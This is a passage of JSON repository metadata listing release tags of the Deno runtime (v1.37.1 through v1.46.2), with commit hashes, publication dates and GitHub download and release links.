16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland